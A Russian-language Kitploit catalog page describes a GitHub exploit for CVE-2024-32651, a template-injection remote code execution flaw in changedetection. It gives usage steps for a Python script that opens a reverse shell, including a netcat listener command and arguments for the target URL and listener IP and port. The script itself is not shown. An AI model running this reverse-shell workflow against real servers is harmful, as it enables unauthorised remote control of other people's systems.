Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32651-changedetection-RCE — Серверная инъекция шаблонов (эксплойт) | Kitploit
Инструменты/GitHubGitHub/s0ck3t-s3c/cve-2024-32651-changedetection-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubs0ck3t-s3c/cve-2024-32651-changedetection-rce

CVE-2024-32651-changedetection-RCE

Серверная инъекция шаблонов (эксплойт)

Репозиторий
4331 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-32651 changedetection < 0.45.20 - Удаленное выполнение кода (RCE)

Эксплойт для Server-Side Template Injection!!

1. Название

Удаленное выполнение кода через Server-Side Template Injection (SSTI) в уязвимом веб-приложении

2. Описание

Этот эксплойт нацелен на веб-приложение, уязвимое к Server-Side Template Injection (SSTI). Используя эту уязвимость, злоумышленник может выполнять произвольные команды на сервере. Предоставленный скрипт на Python автоматизирует процесс эксплуатации, отправляя полезную нагрузку, которая инициирует обратную оболочку.

3. Информация об уязвимости

  1. CVE ID: CVE-2024-32651
  2. Затронутые системы: Веб-приложения, использующие Server-Side Template Injection (SSTI) и имеющие уязвимую конфигурацию.

4. Доказательство концепции

Чтобы воспроизвести уязвимость, запустите предоставленный скрипт Python против уязвимого веб-приложения. Убедитесь, что у вас запущен слушатель (например, nc -lvp 9999) для захвата соединения обратной оболочки.

5. Использование

  1. Сохраните скрипт в файл с именем CVE-2024-32651.py.

  2. Установите необходимые библиотеки Python, если они еще не установлены:

    root@kitploit:~
    pip install requests beautifulsoup4
    
    
  3. Для использования скрипта укажите следующие аргументы командной строки:

  • --url: Базовый URL уязвимого веб-приложения (например, http://10.10.10.10:5000).
  • --port: Порт слушателя (например, 9999).
  • --ip: IP-адрес слушателя (например, 10.10.50.22).
  • --notification: (Необязательно) URL уведомления, если вы хотите использовать конкретный URL уведомления.
  1. Запустите скрипт с помощью Python 3 с необходимыми аргументами. Синтаксис:
    root@kitploit:~
    python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
    

6. Благодарности

Эта исправленная версия эксплойта основана на оригинальном эксплойте, опубликованном Заком Кросманом (zcrosman) с EDB-ID: 52027. Вы можете просмотреть оригинальный эксплойт здесь. Я благодарю Зака Кросмана за его вклад в сообщество безопасности.

Скачать инструмент